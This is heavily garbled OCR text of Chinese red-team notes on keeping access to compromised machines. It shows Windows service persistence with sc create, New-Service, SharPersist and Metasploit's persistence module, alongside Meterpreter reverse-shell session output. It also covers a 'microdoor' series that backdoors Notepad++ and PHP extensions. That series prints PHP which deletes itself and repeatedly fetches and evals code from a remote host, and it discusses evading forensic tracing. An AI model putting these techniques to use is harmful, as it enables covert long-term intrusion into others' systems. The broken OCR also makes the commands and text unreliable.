Sending stage (206403 bytes) to 172.16.194.141 
Meterpreter session 10 opened (172.16.194.133:12345 -» 172.16.194.141:49168) 


meterpreter » 
meterpreter > 
meterpreter > 
meterpreter > 









pa oon 


m 


» 





mm 
R o 


E 
g 
E 


at 2019-12-24 









dows 权限 维持 篇 3- 服 务 service 维 权 — 


意 程序 通过 添加 为 自 启 服务 的 方式 进行 权限 维持 。 通常 服务 这 块 ， 蓝 方 这 块 比 


行 方式 添加 服务 


懂得 了 一 个 普通 管理 员 的 时 候 ， 那 么 可 以 在 cmd 下 使 用 sc 命令 进行 创建 新 的 服务 ， 进 行 后 门 的 
HIF. 


create pentestlab binpath= "cmd.exe /k C:\tmp\payloadi.exe" start= "auto" 


= "LocalSystem" 













Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 





















Peer Networking Grou... Microsoft Corporation 
Program Compatibility ... 3 3 Microsoft Corporation 
BranchCache z 此 服务 绎 存 MW ‘Sy: wv e+ Microsoft Corporation 

bat pentestlab i : Microsoft Corporation 
E Performance Counter . z] REAP... L 4'perfhost.exe Microsoft Corporation 


Performance Logs & Al.. i 性 能 日 志和 警 ， d 32\svchost.exe + Locals... 
Plug and Play 3 2 à 
g PNRP Machine Name P... 
Peer Name Resolution .. PA 
IPsec Policy Agent password- <4/ 75> 
Power 
User Profile Service SENI MeirdBirdB8875? sc create pentestlab binpath- "cmd.ex :\tnp\payload1 
+ Protected Storage L “auto” obj= “LocalSys : 

Quality Windows Audi... 
Remote Access Auto C... 
Remote Access Conne... 
Routing and Remote A... 
» Remote Registry 

RPC Endpoint Mapper 
Remote Procedure Call 
Remote Procedure Call.. 
Security Accounts Man.. 
BitDefender Threat Sc 
Smart Card 

Task Scheduler 


Microsoft Corporation 















teService fi 








iC: Wsers We irdBird@87> 


















重启 后 ， 自 动 上 线 。 


Sending stage (206403 bytes) to 172.16.194.141 
| Meterpreter session 11 opened (172.16.194.133:12345 -» 172.16.194.141:49161) at 2019-12-29 


meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 


meterpreter 
meterpreter 


powershell 形式 添加 服务 权限 维持 


VVMV M V VM V 


New-Service -Name "pentestlab" -BinaryPathName "C:NtmpNpayloadi.exe" 
Description "PentestLaboratories" -StartupType Automatic 


注册 成 功 ， 重 启 仍 可 上 线 ， 进 行 权 限 维持 ， 保 持 权限 不 掉 。 
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r) > exploit 


everse TCP handler on 172.16.194.133:12345 


stage (206403 bytes) to 172,.16.194.141 
“eter session 16 opened (172, 16.194,133:12345 -> 172.16.194,.141:49161) at 2019-12-29 17:18:17 +0800 


ndows 
2009 Microsoft Corporation?7?7?17?1?E?7?7 


stem32»whoami 
y\system 
ystem32>exit 


r > background 
ing session 16... 


Nile irdBird@@7> New-Service -Name "pentestlab" —BinaryPathName tmp\payloadi.exe” -Description "PentestLabo 
-StartupType Automatic 


Name DisplayName 


pentest lab pentest lab 


s MleirdBird887» 





EEV) 帮助 (H) 


应 用 程序 | 进程 服务 性 能 






a 
X 
38 

D 




















名 称 HD ”描述 
p2 





3o 3 C 
EE 























ni jot dal 


TA: 
a 
已 
Program E 
Peer c BranchCache 已 停止 ”PeerDist 
fpentestlab pentestlab Ofsit eae 
Pe: Performa 已 停止 x 
pla 已 停止 ”LocalSer 
PlugPlay 668 Plug and E DconLaunch 
PNRPAutoReg PNRP Mac 已 停止 
PNRP. Ham 已 停止 
c Po 正 
Power 正 
972 User Pro E 
e 
E 





f SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c C:\tmp\payload1. 
B pentestlab" -m add 
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C:Nisers WeirdBird@@?\Desktop> SharPersist -t service -c “C:\Windows System32\cm 
d.exe'" -a "7c CrwtnpNpavloadi.exe" -n "pentestlab" ~m add 


70: fidding service persistence 
* Command: C: WMindousNSustem32Ncmd.exe 
: Command Args: ^c C:Ntmp*payloadi.exe 
* Service Name: pentestlab 


Installing service pentestlab... 
feservice pentestlah has been successfully installed. 


creating EventLog source pentestlab in log Application... 


[+] SUCCESS: Service persistence added 





Metasploit 服务 维权 模块 


msf 自 带 服务 维权 模块 


msf5 exploit(multi/handler) > use post/windows/manage/persistence exe 
msfS post(windows/manage/persistence exe) > set REXEPATH /tmp/payloadi.exe 
REXEPATH => /tmp/payloadi.exe 

msf5 post(windows/manage/persistence exe) » set session 3 

session => 3 

msf5 post(windows/manage/persistence exe) > set startup SERVICE 

startup -» SERVICE 

msf5 post(windows/manage/persistence exe) > set localexepath c:\\tmp 
localexepath => c:\tmp 

msf5 post(windows/manage/persistence_exe) > run 


[-] Post failed: Msf::OptionvalidateError The following options failed to valide 
[*] Post module execution completed 


msf5 post(windows/manage/persistence exe) » set session 17 
session -» 17 
msf5 post(windows/manage/persistence exe) » run 


[*] Running module against WIN-U8NO9PHAQ4D 

[*] Reading Payload from file /tmp/payloadi.exe 

[+] Persistent Script written to c:\tmp\default.exe 
[*] Executing script c:\tmp\default.exe 

[+] Agent executed with PID 3348 

[*] Installing as service.. 

[*] Creating service XMupbnEQkgWeVj 


[*] Cleanup Meterpreter RC File: /home/weirdbird007/.msf4/logs/persistence/WIN-L 
[*] Post module execution completed 
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HE BA 


WHAN Aut... 3 LocalSer... 
Windows ... LocalSys. 
Windows ... - netsyes 


Windows ... T" Seah 


Security... AN LocalSer... 
Portable... LocalSys. 
Parental... i LocalSer... 


nding session 17... 
) > use post/windows/manage/persistence_exe 
) > set REXEPATH /tmp/payload1.exe 
tmp/payload1.exe 
) > set session 3 


) set startup SERVICE 
ERVICE 
) > set localexepath c:\\tmp 
=> c:\tmp 
) > run 


Msf::0ptionValidateError The following options failed to validate: SESSION. 
execution completed 
) > set session 17 


) > run 


dule against WIN-U8N@9PHAQ4D 

Payload from file /tmp/payloadl.exe 
Script written to c:\tmp\default. exe 
script c:\tmp\default.exe 
uted with PID 3348 
as service.. 


ervice XMüpbnEQKDNeV) 


eterpreter RC File: /home/weirdbird807/.msf4/logs/persistence/WIN-UBNO9PHAQ4D, 20191229. 4443/WIN-U8NO9PHAQ4D, 20191229. 4443. rc 
dule execution completed 





xe) > use exploit/multi/handler 
(msf5 exploit > set payload windows/x64/meterpreter/reverse tcp 
payload => windows/x64/meterpreter/ reverse tcp 
imsf5 exploit ndler) » options 


Module options (exploit/multi/handler): 


Name Current Setting Required Description 


Payload options (windows/x64/meterpreter/reverse tcp): 


Name Current Setting Required Description 


EXITFUNC process Exit technique (Accepted: '', seh, thread, Process, none 
LHOST 172.16.194.133 The listen address (an interface may be specified) 
LPORT 12345 The listen port 


Exploit target: 
Id Name 


Wildcard Target 


imsf5 exploit(m /handler) » exploit 


] Started reverse TCP handler on 172.16.194.133:12345 
] 172.16.194.141 - Meterpreter session 17 closed. Reason: Died 


Sending stage (206403 bytes) to 172.16.194.141 
] Meterpreter session 18 opened (172.16.194.133:12345 -» 172.16.194.141:49161) at 2019-12-29 1 


msf 自 带 的 模块 ， 权 限 维持 成 功 
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APTXHA (—) 红 蓝 对 抗 关于 后 门 对 抗 


当 我 们 接 到 某 个 项 目的 时 候 ， 它 已 经 是 被 入 侵 了 。 甚 至 已 经 被 脱 库 ， 或 残留 后 门 等 持续 攻击 洗 
后 渗透 攻击 者 的 本 质 是 什么 ? 

阻止 防御 者 信息 搜集 ， 销 毁 行 程 记录 ， 隐 藏 存留 文件 。 
防御 者 的 本 质 是 什么 ? 

寻找 遗留 信息 ， 发 现 攻击 轨迹 与 样本 残留 并 且 阻 断 再 次 攻击 。 那么 这 里 攻击 者 就 要 引入 "持续 攻 
击 "， 防 御 者 就 要 引入 "溯源 取证 与 清理 遗留 "， 攻 击 与 持续 攻击 的 分 水 岭 是 就 是 后 渗透 持续 攻击 ， 
表现 形式 其 中 之 一 就 是 后 门 。 


后 门 的 种 类 : 


。 本 地 后 门 : 如 系统 后 门 ， 这 里 指 的 是 装机 后 自 带 的 某 功能 或 者 自 带 软件 后 门 
。 本 地 拓展 后 门 : 如 iis 6 的 isapi，iis7 的 模块 后 门 

。 第 三 方 后 门 : 如 apache，serv-u， 第 三 方 软件 后 门 

。 第 三 方 扩展 后 门 : 如 php 扩 展 后 门 ，apache 扩 展 后 门 ， 第 三 方 扩展 后 门 

。 人 为 化 后 门 : 一 般 指 被 动 后 门 ， 由 人 为 引起 触发 导致 激活 ， 或 者 传播 


后 门 的 隐蔽 性 排行 ; 本 地 后 门 > 本 地 拓展 后 门 > 第 三 方 后 门 > 第 三 方 扩展 后 门 ， 这 里 排除 人 为 化 后 。 
门 ， 一 个 优秀 的 人 为 化 后 门 会 造成 的 损失 不 可 估计 ， 比 如 勒索 病毒 的 某 些 非 联网 的 独立 机 器 ， 也 有 
被 勒索 中 毒 。 在 比如 某 微 博 的 蠕虫 等 。 


整体 概括 分 类 为 : 主动 后 门 ， 被 动 后 门 ， 传 播 型 后 门 。 

后 门 的 几 点 特性 ; Baik, ae, HA 

一 个 优秀 的 后 门 ， 一 定 是 具备 几 点 特征 的 ， 无 文件 ， 无 端口 ， 无 进程 ， 无 服务 ， 无 语言 码 ， 并 且 是 
量 身 目标 制定 且 一 般 不 具备 通用 性 。 

攻击 者 与 防御 者 的 本 质 对 抗 是 什么 ? 增加 对 方 在 对 抗 中 的 时 间 成 本 ， 人 力 成 本 。 

这 里 要 引用 百度 对 APT 的 解释 : APT 是 指 高 级 持续 性 威胁 。 利用 先进 的 攻击 手段 对 特定 目标 进行 长 
期 持续 性 网 络 攻击 的 攻击 形式 ，APT 攻 击 的 原理 相对 于 其 他 攻击 形式 更 为 高 级 和 先进 ， 其 高 级 性 主 
要 体现 在 APT 在 发 动 攻 击 之 前 需要 对 攻击 对 象 的 业务 流程 和 目标 系统 进行 精确 的 收集 。 

那么 关于 高 级 持续 渗透 后 门 与 上 面 的 解释 类 似 ; 高 级 持续 渗透 后 门 是 指 高 级 持续 性 后 渗透 权限 长 期 
把 控 ， 利 用 先进 的 后 渗透 手段 对 特定 目标 进行 长 期 持续 性 维持 权限 的 后 攻击 形式 ， 高 级 持续 渗透 后 
门 的 原理 相对 于 其 他 后 门 形式 更 为 高 级 和 先进 ， 其 高 级 性 主要 体现 在 持续 渗透 后 门 在 发 动 持续 性 权 
限 维持 之 前 需要 对 攻击 对 象 的 业务 流程 和 目标 系统 进行 精确 的 收集 并 量 身 制定 目标 后 门 。 

第 一 季 从 攻击 者 角度 来 对 抗 : 


项 目 中 一 定 会 接触 到 溯源 ， 而 溯源 最 重要 的 环节 之 一 就 是 样本 取证 与 分 析 。 既 然 是 样本 取证 ， 也 就 
是 主要 找 残 留 文件 。 可 能 是 脚本 ，dll，so，exe 等 。 其 次 是 查找 相关 流量 异常 ， 端 口 ， 进 程 。 异 党 

志 。 做 为 攻击 者 的 对 抗 ， 无 开放 端口 ， 无 残留 文件 ， 无 进程 ， 无 服务 。 在 防御 者 处 理 完 攻击 事件 
后 的 一 定时 间 内 ， 再 次 激活 。 
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RE lrootkit, EBJA CERES — FREEZE SRAI 百度 百科 是 这 样 解释 的 : Rootkit 
性 殊 的 恶意 软件 ， 它 的 功能 是 在 安装 目标 上 隐藏 自身 及 指定 的 文件 、 进 程 和 网 络 链接 等 信 
简 多 见 到 的 是 Rootkit 一 般 都 和 木马 、 后 门 等 其 他 恶意 程序 结合 使 用 。Rootkit 通 过 加 载 特殊 的 
黎 改 系统 内 核 ， 进 而 达到 隐藏 信息 的 目的 。 


的 进化 中 ，rootkit 也 发 生 了 变化 ， 最 大 的 改变 是 它 的 系统 层次 结构 发 生 了 变化 。 


生成 大 体 分 4 类 : 

标 源码 

县 源码 ， 有 目标 api 

标 源码 ， 无 api， 得 到 相关 漏洞 等 待 触 发 

门生 成 分 类 来 举例 细 说 几 个 demo。 

标 源码 

量 服务 器 上 有 第 三 方 软件 。 这 里 以 notepad++ 为 例 。 

ad++ 是 Windows 操 作 系统 下 的 一 套 文本 编辑 器 ， 有 完整 的 中 文化 接口 及 支持 多 国语 言 编写 的 
并 且 免 费 开源 。 

目地 址 : nup: 
Biz: https:/ slogspot.hk/2017/12/1nc 
) 环境 : windows 7 x64, notepad++(x64) 

9 IDE: vs2017 

吗 中 ， 我 们 修改 每 次 打开 以 php 结 尾 的 文件 ， 先 触发 后 门 ， 在 打开 文件 。 其 他 文件 跳 过 触发 后 





"bio k/2017/12/1notepad.html 













大 小 


if A demo. php 


计算 机 - 软件 Œ:) ~ Program Files ~ Notepadtt - 





组 织 ”新建 文件 夹 











eTR localization 2017/12/12 21:37 
RE 点 面 
soln à plugins 2017/12/12 21:37 
最 近 访问 的 位 置 
updater 2011/12/12 21:37 
E ; ; deb 2011/12/24 1:12 
Rus | notepadt+ (demo) . exe 2017/12/24 2:24 
tee oy lad notepadtt. exe 2017/12/6 5:20 
EU 2011/12/12 21:37 
» BR 
E 计算 机 
ici CO 
cs X5) 0:) 
软件 GO 
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名 称 “ | 修改 日 期 类 型 A 





















_ demo. php 
eo load microdoor 
Mm F:\code\microdoor_demo\demo. php ~ petisset 
文件 @) RED 搜索 GS) 视图 W) RAAM GERD west IRO #0 
a E Sa a etal & d! fe | | oa C | d * £o? 203 -A 
oe] demo. php. | 
This is microdoor 
文件 被 正常 打开 。 





"i 


gooOR® o oa eh ae my :: 
= deno. php | 
This is microdoor demos. 
| Elvindovs 任务 管理 器 
REG) 选项 @) 39:9 0) 帮助 00 
应 用 程序 进程 | 服务 ”| 性 能 | 联网 | 用 户 | 
| 映像 名 称 [RPS [cv] 内 存 传 用 工作 集 ) - MER 


svchost.exe SYSTEM 00 24,000 K C: Windows \Systen30\svchort. exe 
notepadtt. .. John 00 23,504 K E:\Program A Eada POR E exe 


优点 : 在 对 抗 反 病毒 ， 反 后 门 软件 中 有 绝对 优势 ， 可 本 地 多 次 调试 ， 稳 定性 强壮 。 跨 aKa 
强壮 ， 并 且 可 以 对 后 门 选择 方式 任意 ， 如 主动 后 门 ， 被 动 后 门 ， 人 为 化 后 站 等 
缺点 ; 针对 性 较 强 ， 需 要 深入 了 解 目标 服务 器 安装 或 使 用 软件 。 需 要 语言 不 确定 的 语言 基础 。 在 封 


闭 系 统 ， 如 Windows 下 多 出 现 于 第 三 方 开源 。 
2. 无 目标 源码 
参考 内 部 分 享 第 九 课 
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Hiss, BUS RS—EUS, BERRY, ITG87Z—N, HEIRTAS 
st, ERÉBIDUASEEXEST DARARHR, WEE, GSP], AIETE 
UTAH, EXER, SBMS, RSME. 


源码 ， 有 目标 api 


数 的 Ms_server， 内 置 is， 从 windows2000 开 始 ， 而 目前 国内 市 场 使 用 03sp2，08r2 为 主 。 
以 is 为 主 ， 在 iis 中 目前 主要 分 为 iis5.x ，iis6.x， 大 于 等 于 iis7.x。iis7 以 后 有 了 很 大 的 变 
引入 模块 化 体系 结构 。iis6.x 最 明显 的 是 内 置 IUSR 来 进行 身份 验证 ，I1S7 中 ， 每 个 身份 验 
被 隔离 到 自己 的 模块 中 ， 或 安装 或 卸载 。 

i 国内 市 场 另 一 种 常见 组 合 XAMP (WIN+Apchetmysqi+php, 5 

pche+mysql+php), php5.x 与 php7.x 有 了 很 大 的 变化 ，PHP7 将 基于 最 初 由 Zend 开 发 的 
来 改进 其 框架 。 并 且 加 入 新 功能 ， 如 新 运算 符 ， 标 记 ， 对 十 六 进 制 的 更 友好 支持 等 。 

FiA: windows 7x86 php5.6.32 

DE: vs2017 

人 有 查看 加 载 扩展 ， 命 令 为 php -m， 有 着 部 分 的 默认 扩展 ， 而 在 扩展 中 ， 又 可 以 对 自己 不 显 
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:NxamppNphp»php -m 
CPHP Modules] 





示 在 扩展 列表 中 
php.ini 配置 
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o @ Q wy 5 woe] o9 i u 





E les demo. php | i iei ja 
ik ?php 
echo "mpicrodoor"; 















p @ D 127.0.0.1/4 


php 为 例 ，demo.php 代 码 如 下 : 
y F | 


yption* Encoding ^ 


E a, Split | ' Run | 


1/127. 0. 0. 1/demo. php 





Bi CAxampp\htdocs\demo.php - Notepad++ 
ZHP SAE BRS) RAV SUN) Bah 





BOW) ? 
EU o ə to i=) | aa 
able Post data i 
FE ~~) demo. php | 





r opoor_php=phpinfo() ; 


<?php 
echo "UigimW mmm 
F te "c 


间 demo.php，post 带 有 触发 后 门 特 征 ， 来 执行 攻击 者 的 任意 php 代 码 。 在 demo 中 ， 仅 仅 是 做 到 
明显 的 以 php 后 缀 为 结尾 的 后 门 ， 那 么 结合 第 一 条 ， 有 目标 源码 为 前 提 ， 来 写 入 其 他 默认 自 
展 中 ， 来 达到 更 隐蔽 的 作用 。 


Uu 在 对 抗 反 病毒 ， 反 后 门 软件 中 有 绝对 优势 ， 可 本 地 多 次 调试 ， 稳 定性 非常 强壮 。 跨 平台 能 力 
强壮 ， 且 可 以 对 后 门 选择 方式 任意 ， 如 主动 后 门 ， 被 动 后门 ， 人 为 化 后 门 等 。 

在 编 译 后 门 的 时 候 ， 需 要 查阅 大 量 APl， 一 个 平台 到 多 个 平台 的 相关 API。 调 试 头 弄 ， 失 眠 ， 
下 去 饭 。 领 导 不 理解 ， 冷 暖 自 知 。 


= 季 从 防御 者 角度 来 对 抗 。 
SAVE: 
国内 市 场 的 全 流量 日 志 分 析 ， 由 于 受制 于 存储 条 件 等 因素 ， 大 部 分 为 全 流量 ， 流 量 部 分 分 析 。 


和 在 高 级 持久 性 后 门 中 ， 如 何 建立 一 个 伪 流 量 非 实 用 数据 来 逃逸 日 志 分 析 ， 这 应 该 是 一 个 优秀 高 
说 续 后 门 应 该 思考 的 问题 。 


—Micropoor 
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APTXHA (=) 红 蓝 对 抗 关于 后 门 对 抗 





= :于 后 门 ; https://micropoot 


emo notepad++. 


后 门 是 渗透 测试 的 分 水 岭 ， 它 分 别 体 现 了 攻击 者 对 目标 机 器 的 熟知 程度 ， 环 境 ， 编 程 语言 ， 了 解 
方 客户 ， 以 及 安全 公司 的 本 质 概念 。 这 样 的 后 门 才能 更 隐蔽 ， 更 长 久 。 
而 对 于 防御 者 需要 掌握 后 门 的 基本 查 杀 ， 与 高 难度 查 杀 ， 了 解 被 入 侵 环境 ， 目 标 机 器 。 以 及 后 门 
者 病毒 可 隐藏 角落 ， 或 样本 取证 ， 内 存 取 证 。. 所 以 说 后 门 的 安装 与 反 安 装 是 一 场 考试 ， 一 场 实战 
考试 。 

这 里 要 引用 几 个 概念 ， 只 有 概念 清晰 ， 才 能 把 后 门 加 入 概念 化 ， 使 其 更 隐蔽 。 

1: 攻击 方 与 防御 方 的 本 质 是 什么 ? 

增加 对 方 的 时 间 成 本 ， 人 力 成 本 ， 资 源 成 本 (不 限制 于 服务 器 资源 ) ， 人 金钱 成 本 。 

2: 安全 公司 的 本 质 是 什么 ? 

Bal, BAMA, RAH 

3: 安全 公司 产品 的 本 质 是 什么 ? 

能 适应 大 部 分 客户 ， 适 应 市 场 化 ， 并 且 适 应 大 部 分 机 器 。 (包括 不 限制 于 资源 紧张 ， 宽 带 不 足 等 问 
题 的 客户 ) 

4: 安全 人 员 的 本 质 是 什么 ? 

赚钱 ， 养 家 。 买 房 ， 还 房贷 。 导 致 ， 快 速 解决 客户 问题 (无 论 暂 时 还 是 永久 性 解决 ) ， 以 免 投 诉 。 
5: 对 接客 户 的 本 质 是 什么 ? 

对 接客 户 也 是 某 公司 内 安全 工作 的 一 员 ， 与 概念 4 相同 。 


清晰 了 以 上 5 个 概念 ， 作 为 攻击 者 ， 要 首先 考虑 到 对 抗 成 本 ， 什 么 样 的 对 抗 成 本 ， 能 满足 概念 1-5。 
影响 或 阻碍 对 手 方 的 核心 利益 。 把 概念 加 入 到 后 门 ， 更 隐 巩 ， 更 长 久 。 


文章 的 标题 既然 为 php 安 全 新 闻 早 八 点 ， 那 么 文章 的 本 质 只 做 技术 研究 ，Demo 本 身 不 具备 攻击 或 者 
持续 控制 权限 功能 。 

Demo 连 载 第 二 季 : 

Demo 环境 : windows 7 x64, notepad++(x64) 

Demo IDE: vs2017 

在 源码 中 ， 我 们 依然 修改 每 次 打开 以 php 结 尾 的 文件 ， 先 触发 后 门 ， 在 打开 文件 。 其 他 文件 跳 过 触 
发 后 门 。 但 是 这 次 代码 中 加 入 了 生成 micropoortxt 功 能 。 并 且 使 用 php 来 加 载运 行 它 ， 是 的 ， 生 成 一 
个 txt。demo 中 ， 为 了 更 好 的 演示 ， 取 消 自动 php 加 载运 行 该 txt。 

而 txt 的 内 容 如 图 所 示 ， 并 且 为 了 更 好 的 了 解 ， 开 启 文件 监控 。 
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[v 新 增 文 件 Bk vw T 重 命名 三 ， ^ 
Iv. 监视 子 文 件 来 的 事件 
EE moo s 


© 目录 和 文件 C Ref C RER 


保存 取消 | 


| aum | 
属性 检测 用 户 eem 


“i * 


à 组 织 > | Sich 
EHE + HBX m -| ee 


和 名称 。 e 下 载 localization 
me mm ' 
bong ieri UE R plugins 
EIE 最 近 访问 的 位 置 
updater 
E rd notepadtt (debug) . exe 
HB 视频 (f notepadt+ (demo? . exe 
= & | 4 notepadtt (demo2) . exe 
i 文档 notepadt+, exe 
o 音乐 p 
> uninstall. exe 
u 计算 机 
£o 本 地 磁盘 CO 
;学习 0) 
Be md 
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使 用 
pad (demo): exe e 打开 以 php 结 尾 的 demoa php， 来 触发 microdoor。 并 且 生成 了 micropoor txt 








| Ee 
_ €3. / ”~ 计算 机 © 软件 QU) © Program Files ~ Notepadtt ~ 
ha m- SNORE (:) > code v micro i 


修改 日 期 


2017/12/12 21:37 
2017/12/12 21:37 
2017/12/12 21:37 
2017/12/24 1:12 
2017/12/24 2:24 
2011/12/28 1:12 





2017/12/6 5:20 
2017/12/12 21:37 








This is microdoor demos, 


“xf BR BS EB 
快速 新 增 : 
目录 i 事件 
FAcodelmicropoor 新 增 文 件 , HER. WM E 


TB 


rindors 任务 管理 器 
XO) 选项 (0) Bw) 帮助 00) 





N- ea py. 
G OPER + SD Q0 code > micropoor 
组 织 v 打开 ~ PEN 新 建文 件 来 
cR ,micropoor. txt 
EE Siu 


FIERI SR 
| txt ~ 记事 本 
文件 中) RE) AAO FAV 帮助 00 
<?php | l 
unlink($  SERVER[' SCRIPT_FILENAME’ ]) ; 


ignore user abort (true); 
set time limit(0): 





$remote file = 'http://xxx/xxx. txt’ ; 
while($code = file get. contents ($remote_ file) 
teval ($code); 

sleep (8) ; 

25 


配合 
micropoor.txt 的 内 容 ， 这 次 的 Demo 将 会 变 得 更 有 趣 。 那么 这 次 demo 做 到 了 ， 无 服务 ， 无 进程 ， 无 


1350 






下 条 概念 ， 加 入 到 了 demo 中 ， 增 加 对 手 成 本 。 使 其 更 隐蔽 。 ， 
不 是 notepad++， 而 是 mysql 呢 ?用 它 的 端口 ， 它 的 进程 ， 它 的 服务 ， 它 的 一 切 ， 来 重新 编 


个 攻击 者 值得 思考 的 问题 。 
PI: 在 后 门 的 进化 中 ，rootkit 也 发 生 了 变化 ， 最 大 的 改变 是 它 的 系统 层次 结构 发 生 了 
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APTH (=) 红 蓝 对 抗 关于 后 门 对 抗 “ 


前 者 的 话 : 从 第 三 季 开 始 引入 段子 ， 让 本 枯燥 的 学 术 文章 ， 也 变 得 生动 有 趣 。 第 二 季 的 Demo i 
人 性 五 条 来 设计 ， 回 忆 这 其 中 五 条 : 


1: 攻击 方 与 防御 方 的 本 质 是 什么 ? 

增加 对 方 的 时 间 成 本 ， 人 力 成 本 ， 资 源 成 本 (不 限制 于 服务 器 资源 ) ， 金 钱 成 本 。 
2: 安全 公司 的 本 质 是 什么 ? 

一 利 ， 最 小 投入 ， 最 大 产 出 。 

3: 安全 公司 产品 的 本 质 是 什么 ? 

能 适应 大 部 分 客户 ， 适 应 市 场 化 ， 并 县 适应 大 部 分 机 器 。 《包括 不 限制 于 资源 紧张 ， 宽 带 不 足 等 间 
题 的 客户 ) 

4: 安全 人 员 的 本 质 是 什么 ? 

赚钱 ， 养 家 。 买 房 ， 还 房贷 。 导 致 ， 快 速 解决 客户 问题 (无 论 暂时 还 是 永久 性 解决 ) ， 以 免 投 诉 。 
5: 对 接客 户 的 本 质 是 什么 ? 

对 接客 户 也 是 某 公 司 内 安全 工作 的 一 员 ， 与 概念 4 相同 。 

6: 线 索 排查 与 反 线索 排查 


那么 这 个 demo 离 可 高 级 可 持续 性 渗透 后 门 还 有 一 段 距 离 ， 这 里 引入 第 六 条 “线索 排查 " 与 “ 反 线 索 
排查 ”， 在 第 二 季 的 demo 中 ， 它 生成 了 一 个 名 为 micropoor.txt 的 文件 ， 如 果 经 验 丰 富 的 安全 人 员 可 
根据 时 间 差 来 排查 日 记 ，demo 的 工作 流程 大 致 是 这 样 的 ， 打 开 notepad++， 生 成 micropoortxt， 写 
入 内 容 ， 关 闭 文件 流 。 根 据 线索 排查 ， 定 位 到 notepad++， 导 致 权限 失控 。 


在 线索 排查 概念 中 ， 这 里 要 引入 “ABC" 类 线索 关联 排查 ， 当 防御 者 在 得 到 线索 A， 顺 芯 到 B， 最 后 ， 
排查 到 目标 文件 C， 根 据 五 条 中 的 第 一 条 ，demo 要 考虑 如 何 删除 指定 日 志 内 容 ， 以 及 其 他 操作 。 来 
阻止 ABC 类 线索 关联 排查 。 


不 要 思维 固 死 在 这 是 一 个 nontepad++ 后 门 的 文章 ， 它 是 一 个 面向 类 后 门 ， 面 向 的 是 可 掌握 源码 编 
译 的 类 后 门 。 















观看 目前 文章 的 一 共有 2 类 人 ， 一 类 攻击 方 ， 一 类 防守 方 。 假 设 一 个 场景 ， 现 在 摆 在 你 面前 有 一 台 
笔记 本 ， 并 且 这 台 笔 记 本 有 明确 的 后 门 ， 你 的 任务 ， 排 查 后 门 。 我 想 所 有 人 都 会 排查 注册 表 ， 服 
务 ， 端 口 ， 进 程 等 。 因 为 这 些 具备 通用 性 ， 也 同样 具备 通用 性 排查 手段 。 


临近 文章 结尾 ， 第 三 次 引用 : 在 后 门 的 进化 对 抗 中 ，rootkit 也 发 生 了 变化 ， 最 大 的 改变 是 它 的 系统 
层次 结构 发 生 了 变化 。 


——Micropoor 


1352 




















从 员 ， 其 实 至 少 一 直 在 与 传统 后 门 对 抗 ， 比 如 最 常见 的 webshell 免 杀 与 webshell 过 waf。 应 
展示 取证 查 杀 远 控 残 留 文件 等 。 但 是 webshell， 远 控 仅 仅 又 是 "backdoor" 的 其 中 一 种 。 


几 季 的 风格 继续 引用 几 个 概念 ， 只 有 概念 清晰 ， 才 能 了 解 如 何 对 抗 。 


从 业 人 员 为 什么 要 了 解 后 门 ? 
市 场 为 核心 的 ， 而 不 是 以 项 目 为 核心 。 需 要 对 抗 的 可 能 是 黑 产 从 业者 的 流量 动 持 相关 后 
渚 是 政治 黑客 的 高 持续 渗透 权限 把 控 后 门 等 。 


BARNHART WT]? 


GRE IO RRM, ERK, BTA, ISARA. BAMUEROE 
定 ， 如 何 反 追 踪 ， 是 一 个 非常 值得 思考 的 问题 。 


门 与 项 目的 关联 是 什么 ? 


d 被 入 侵 ， 应 急 并 加 固 解决 ， 若 干 天 后 ， 再 次 被 入 侵 依然 自 改 为 某 博 彩 。 导 致 安全 从 业 人 
户 之 间 的 问题 。 


门 与 安全 产品 的 关联 是 什么 ? 


时 购买 某 安 全 产品 套装 ， 在 实战 中 ， 一 般 由 非 重点 关注 服务 器 迁 回 渗透 到 核心 服务 器 来 跨 过 安 
6 监控， 得 到 相关 权限 后 ， 后 门 起 到 越过 安全 产品 。 它 会 涉及 对 其 他 附属 安全 产品 的 影响 。 如 
RE: 为 什么 我 都 买 了 你 们 的 套装 ， 还 被 入 侵 。 并 且 这 还 是 第 二 次 了 。 


于 一次 引入 百度 百科 的 APT 的 主要 特性 : 


BATE: 这些 新 型 的 攻击 和 威胁 可 能 在 用 户 环境 中 存在 一 年 以 上 或 更 久 ， 他 们 不 断 收集 各 种 信 
县 到 收集 到 重要 情报 。 而 这 些 发 动 APT 攻 击 的 黑客 目的 往往 不 是 为 了 在 短 时 间 内 获 利 ， 而 是 把 


型 定 特定 目标 : 针对 特定 政府 或 企业 ， 长 期 进行 有 计划 性 、 组 织 性 的 窍 取 情 报 行为 ,针对 被 锁 
隶 宵 送 几 可 乱 真 的 社交 工程 恶意 邮件 ， 如 冒充 客户 的 来 信 ,取得 在 计算 机 植 入 恶意 软件 的 第 一 个 
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一 一 安装 远程 控制 工具 : 攻击 者 建立 一 个 类 似 僵尸 网 络 Botnet 的 远程 控制 架构 ， 攻 击 者 会 
有 潜在 价值 文件 的 副本 给 命令 和 控制 服务 器 (C&C Serven) 审 查 。 将 过 二 滤 后 的 敏感 机 密 数据 ， 
密 的 方式 外 传 。 


一 次 针对 特定 对 象 ， 长 期 、 有 计划 性 渗透 的 本 质 是 什么 ? 

窃取 数据 下 载 到 本 地 ， 或 者 以 此 次 渗透 来 达到 变现 目的 。 

义 渗透 DMZ 区 为 主 ， 重 : 
器 ， 文件 服务 器 ， OA 服务 器 ) ， 

CO) 等 。 而 往往 这 样 的 高 级 持续 渗透 ，: 

或 。 而 这 里 其 中 一 个 重要 的 环节 就 是 

STE) 以 保持 后 续 渗 透 。 










于 个 人 机 ， 开发 机 > 
间 内 ， 来 渗透 到 j oh 
A (包括 但 不 限制 于 一周 


传统 型 的 后 门 不 在 满足 攻击 








需求 ， 而 传统 型 的 木马 后 门 ， 大 致 可 分 为 六 代 





一 代 ， 是 最 原始 的 木马 程序 
马 最 基本 的 功能 。 


第 二 代 ， 在 技术 上 有 了 很 大 的 进步 ， 冰 河 是 中 国 木马 的 典型 代表 之 一 。 


主要 是 简单 的 密码 窃取 ， 通 过 电子 邮件 发 





， 出 现 了 ICMP 等 3 











TL eee ees 
Ay SRG 


roy, 
马 的 代表 





IBATI 一 体 化 〈 包 括 但 


抗 目前 的 反 病 毒 反 后 门 


